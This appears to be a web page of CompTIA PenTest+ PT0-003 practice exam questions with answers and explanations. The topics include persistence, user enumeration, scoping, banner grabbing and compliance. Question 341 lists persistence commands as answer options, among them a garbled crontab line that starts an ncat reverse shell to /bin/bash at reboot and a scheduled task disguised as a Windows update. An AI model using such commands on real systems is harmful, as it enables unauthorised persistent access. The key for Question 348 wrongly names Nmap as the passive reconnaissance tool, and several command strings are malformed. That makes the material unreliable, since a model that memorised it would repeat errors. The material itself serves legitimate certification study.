CompTIA PT0-003 Online Practice Questions and Exam Preparation

CompTIA PT0-003 Online Questions & Answers

• Question 341:

  A penetration tester was able to gain access successfully to a Windows workstation on a mobile client's laptop.

  Which of the following can be used to ensure the tester is able to maintain access to the system?

  A. schtasks /create /sc /ONSTART /tr C:\Temp\WindowsUpdate.exe
  B. wmic startup get caption,command
  C. crontab ; echo "@reboot sleep 200 && ncat vp 4242 /bin/bash") | crontab 2>/dev/null
  D. sudo useradd u 0 0 user
  A. schtasks /create /sc /ONSTART /tr C:\Temp\WindowsUpdate.exe

• Question 342:

  A penetration tester enters an invalid user ID on the login page of a web application. The tester receives a message indicating the user is not found. Then, the tester tries a valid user ID but an incorrect password, but the web application indicates the password is invalid.

  Which of the following should the tester attempt next?

  A. Error log analysis
  B. DoS attack
  C. Enumeration
  D. Password dictionary attack
  C. Enumeration

  ---

  Explanation

  The application is giving distinct error messages for valid vs. invalid usernames. This is a classic case of user enumeration , where an attacker can determine valid accounts before proceeding to brute-force or password attacks.

  From the CompTIA PenTest+ PT0-003 Official Study Guide (Chapter 6 ?Vulnerability Identification) :

  "Authentication systems that return different error messages based on the validity of the username can allow attackers to enumerate valid accounts."

  References:

  Chapter 6, CompTIA PenTest+ PT0-003 Official Study Guide

• Question 343:

  A penetration tester is unable to identify the Wi-Fi SSID on a client's cell phone.

  Which of the following techniques would be most effective to troubleshoot this issue?

  A. Sidecar scanning
  B. Channel scanning
  C. Stealth scanning
  D. Static analysis scanning
  B. Channel scanning

  ---

  Explanation

  Since SSID broadcast might be hidden, channel scanning allows the tester to identify active Wi-Fi networks.

  Option A (Sidecar scanning): Not a recognized Wi-Fi testing method.

  Option B (Channel scanning): Correct.

  Identifies hidden SSIDs by monitoring probe requests and responses.

  Option C (Stealth scanning): Typically refers to evading detection, not Wi-Fi analysis.

  Option D (Static analysis scanning): Static analysis applies to code security, not Wi-Fi networks.

  References:

  CompTIA PenTest+ PT0-003 Official Guide ?Wireless Reconnaissance Techniques

• Question 344:

  A tester who is performing a penetration test discovers an older firewall that is known to have serious vulnerabilities to remote attacks but is not part of the original list of IP addresses for the engagement.

  Which of the following is the BEST option for the tester to take?

  A. Segment the firewall from the cloud.
  B. Scan the firewall for vulnerabilities.
  C. Notify the client about the firewall.
  D. Apply patches to the firewall.
  C. Notify the client about the firewall.

  ---

  Explanation

  The best option for the tester to take is to notify the client about the firewall. The firewall is not part of the original list of IP addresses for the engagement, which means it is out of scope and should not be tested without permission. The tester should inform the client about the existence and potential risks of the firewall, and ask if they want to include it in the scope or not.

• Question 345:

  Which of the following could be used to enhance the quality and reliability of a vulnerability scan report?

  A. Risk analysis
  B. Peer review
  C. Root cause analysis
  D. Client acceptance
  B. Peer review

  ---

  Explanation

  A peer review ensures the accuracy, completeness, and objectivity of a penetration test report.

  Option A (Risk analysis): Helps prioritize vulnerabilities but does not validate report accuracy.

  Option B (Peer review): Correct.

  Ensures report accuracy and consistency.

  Identifies misinterpretations or missing details.

  Option C (Root cause analysis): Helps in remediation but does not verify report quality.

  Option D (Client acceptance): A client review is final verification, but peer review happens earlier to ensure accuracy.

  References:

  CompTIA PenTest+ PT0-003 Official Guide ?Reporting&

  Quality Assurance

• Question 346:

  A penetration tester creates a list of target domains that require further enumeration. The tester writes the following script to perform vulnerability scanning across the domains:

  line 1: #!/usr/bin/bash

  line 2: DOMAINS_LIST = "/path/to/list.txt" line 3: while read -r i; do

  line 4: nikto -h $i -o scan-$i.txt & line 5: done The script does not work as intended.

  Which of the following should the tester do to fix the script?

  A. Change line 2 to {"domain1", "domain2", "domain3", }.
  B. Change line 3 to while true; read -r i; do.
  C. Change line 4 to nikto $i | tee scan-$i.txt.
  D. Change line 5 to done < "$DOMAINS_LIST".
  D. Change line 5 to done < "$DOMAINS_LIST".

  ---

  Explanation

  The issue with the script lies in how the while loop reads the file containing the list of domains. The current script doesn't correctly redirect the file's content to the loop. Changing line 5 to done < "$DOMAINS_LIST" correctly directs the loop to read from the file.

  Step-by-Step Explanation

  Original Script:

  DOMAINS_LIST="/path/to/list.txt" while read -r i; do

  nikto -h $i -o scan-$i.txt &

  done Identified Problem:

  The while read -r i; do loop needs to know which file to read lines from. Without redirecting the input file to the loop, it doesn't process any input.

  Solution:

  Add done < "$DOMAINS_LIST" to the end of the loop to specify the input source.

  Corrected script:

  DOMAINS_LIST="/path/to/list.txt" while read -r i; do

  nikto -h $i -o scan-$i.txt &

  done < "$DOMAINS_LIST" done < "$DOMAINS_LIST" ensures that the while loop reads each line from DOMAINS_LIST.

  This fix makes the loop iterate over each domain in the list and run nikto against each.

• Question 347:

  A penetration tester is configuring a vulnerability management solution to perform credentialed scans of an Active Directory server.

  Which of the following account types should the tester provide to the scanner?

  A. Read-only
  B. Domain administrator
  C. Local user
  D. Root
  B. Domain administrator

  ---

  Explanation

  To perform credentialed scans on an Active Directory (AD) server, the scanner requires high-level access to retrieve system configuration, patch levels, and user rights. A Domain Administrator account ensures full visibility into domain resources and permissions, which is essential for a complete vulnerability assessment.

  From the CompTIA PenTest+ PT0-003 Objectives ?Domain 2.0:

  Information Gathering and Vulnerability Identification:

  "Credentialed scans require administrative-level access on target systems to provide detailed insights into software versions, missing patches, and security settings."

  References:

  CompTIA PenTest+ PT0-003 Official Study Guide, Chapter 6

• Question 348:

  Which of the following tools would be MOST useful in collecting vendor and other security-relevant information for IoT devices to support passive reconnaissance?

  A. Shodan
  B. Nmap
  C. WebScarab-NG
  D. Nessus
  B. Nmap

• Question 349:

  A penetration tester needs to confirm the version number of a client's web application server.

  Which of the following techniques should the penetration tester use?

  A. SSL certificate inspection
  B. URL spidering
  C. Banner grabbing
  D. Directory brute forcing
  C. Banner grabbing

  ---

  Explanation

  Banner grabbing is a technique used to obtain information about a network service, including its version number, by connecting to the service and reading the response.

  Understanding Banner Grabbing:

  Purpose: Identify the software version running on a service by reading the initial response banner.

  Methods: Can be performed manually using tools like Telnet or automatically using tools like Nmap.

  Manual Banner Grabbing:

  Step-by-Step Explanationtelnet target_ip 80

  Netcat: Another tool for banner grabbing.

  nc target_ip 80 Automated Banner Grabbing:

  Nmap: Use Nmap's version detection feature to grab banners.

  nmap -sV target_ip

  Benefits:

  Information Disclosure: Quickly identify the version and sometimes configuration details of the service.

  Targeted Exploits: Helps in selecting appropriate exploits based on the identified version.

  References from Pentesting Literature:

  Banner grabbing is a fundamental technique in reconnaissance, discussed in various penetration testing guides. HTB write-ups often include banner grabbing as a step in identifying the version of services.

  References:

  Penetration Testing - A Hands-on Introduction to Hacking

  HTB Official Writeups

• Question 350:

  Which of the following compliance requirements would be BEST suited in an environment that processes credit card data?

  A. PCI DSS
  B. ISO 27001
  C. SOX
  D. GDPR
  A. PCI DSS